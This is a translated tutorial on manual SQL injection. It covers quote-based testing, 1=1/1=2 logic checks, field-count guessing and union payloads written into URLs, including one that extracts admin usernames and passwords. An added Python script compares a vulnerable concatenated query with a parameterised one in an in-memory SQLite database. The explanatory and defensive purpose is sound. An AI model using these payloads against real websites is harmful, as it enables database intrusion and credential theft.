Suppose the value of the articleid variable is 123. What code will run on the server?
    SELECT *                /* SELECT reads the information */
    FROM infotable          /* FROM the infotable data table */
    WHERE id = '123';       /* WHERE gives the condition the rows must meet */
/* XXXX */ is the comment syntax: when the statement runs, the database ignores everything between /* and */.
The actual statement executed by the system is:
    select * from infotable where id = '123';
Here the id value "123" comes from the URL. What happens if we do this:
    info.php?articleid=123'
A single quotation mark is appended. Compare the statement the system originally executed with the new one:
    select * from infotable where id = 123;
    select * from infotable where id = 123';
The extra quotation mark at the end makes the syntax invalid.
Note: when a program fails to produce the expected result, there are two kinds of error: syntax errors and logic errors. Read the two statements above carefully and the difference becomes clear. This is why the first step in testing for an injection point is to append a single quotation mark (a quotation-mark error alone cannot prove the URL is an injection point; it is only one step of the judgement). The purpose of 1 = 1 and 1 = 2 is then also clear:
    select * from infotable where id = 123;
    select * from infotable where id = 123 and 1 = 1;   -- 1 really is equal to 1, so the normal page is returned
    select * from infotable where id = 123 and 1 = 2;   -- 1 is never equal to 2, a logic error, so the error page is returned
Manual injection usually relies on the union query. The following describes how union is used.
The first step of union injection is generally to guess the number of fields. If the injection point is a news page, the SQL statement the page executes is:
    select title, date, author, news, comm from news where id = 12;
In a union injection, the statement before union and the statement after union are each a complete SQL statement that could be executed on its own. However, the two must have the same number of fields. For example, starting from the statement above:
    select title, date, author, news, comm from news where id = 12;
    select title, date, author, news, comm from news where id = 12 union select name, password, 3, 4, 5 from admin;
    -- news is the news table, admin is the administrator information table.
    -- The administrator table obviously does not have as many fields as the news table before the union, so the numbers 3, 4, 5 fill the remaining positions. These numbers have no fixed format: they can be 1, 2, 3, or 111111, or 4435435, or simply null.
Therefore, the injection statement above is constructed in the URL as follows:
    info.php?id=12+union+select+name,password,3,4,5+from+admin
    -- In SQL injection the plus sign stands for a space, because some browsers automatically convert a space to %20.
If there are five fields before the union but not five after it, a logic error occurs and the error page is displayed.
Since we do not know how many fields the programmer put in the table, we usually guess the number of fields first, that is:
    info.php?id=12+union+select+1
    info.php?id=12+union+select+1,2
    info.php?id=12+union+select+1,2,3
    info.php?id=12+union+select+1,2,3,4
    info.php?id=12+union+select+1,2,3,4,5
    -- order by can also be used to guess the field count.
Keep guessing this way until the page renders correctly. Once there is no logic error, the number of fields is consistent, and then ...... later ......
Here we only provide ideas.
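As an added example (not part of the original article), the following Python script builds an in-memory SQLite copy of the news and admin tables sketched above with constructed sample rows, and runs the article's probe values (a trailing quote, 1=1, 1=2, and the union) through two query styles: the concatenation that makes the page injectable, and a hardened version that validates the id as an integer and binds it with a placeholder. The table layout, rows, and function names are assumptions for the demonstration.

```python
import sqlite3

# Constructed in-memory schema and rows (not from the article) mirroring its
# news / admin tables, so both query styles can be compared side by side.
def make_db():
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE news(id INTEGER, title TEXT, date TEXT, author TEXT, news TEXT, comm TEXT);
        CREATE TABLE admin(name TEXT, password TEXT);
        INSERT INTO news VALUES (12, 'Hello', '2014-09-01', 'ed', 'body', 'none');
        INSERT INTO admin VALUES ('admin', 'hunter2');
    """)
    return conn

def query_vulnerable(conn, raw_id):
    # The URL value is pasted straight into the SQL text, so "and 1=2" or
    # "union ..." becomes part of the statement the database parses.
    sql = "select title, date, author, news, comm from news where id = " + raw_id
    return conn.execute(sql).fetchall()

def query_safe(conn, raw_id):
    # Two layers of defence: reject anything that is not an integer, then bind
    # the value through a placeholder so the driver sends it as data, never as
    # SQL syntax.
    article_id = int(raw_id)          # raises ValueError for "12 and 1=2", "12'" ...
    sql = "select title, date, author, news, comm from news where id = ?"
    return conn.execute(sql, (article_id,)).fetchall()

def probe(conn, raw_id):
    """Run one URL value through both paths.  Returns (vulnerable, safe); a
    database error on the vulnerable path (the article's quote test) and a
    rejected value on the safe path are both reported as None."""
    try:
        vuln = query_vulnerable(conn, raw_id)
    except sqlite3.Error:
        vuln = None
    try:
        safe = query_safe(conn, raw_id)
    except ValueError:
        safe = None
    return vuln, safe

if __name__ == "__main__":
    db = make_db()
    for value in ("12", "12'", "12 and 1=1", "12 and 1=2",
                  "12 union select name, password, 3, 4, 5 from admin"):
        vuln, safe = probe(db, value)
        print(f"{value!r}: vulnerable -> {vuln}, safe -> {safe}")
```

The vulnerable path reproduces the article's three page states (normal, error, logic error) and leaks the admin row on the union, while the safe path returns the article only for a genuine integer and rejects every other value before it reaches the database.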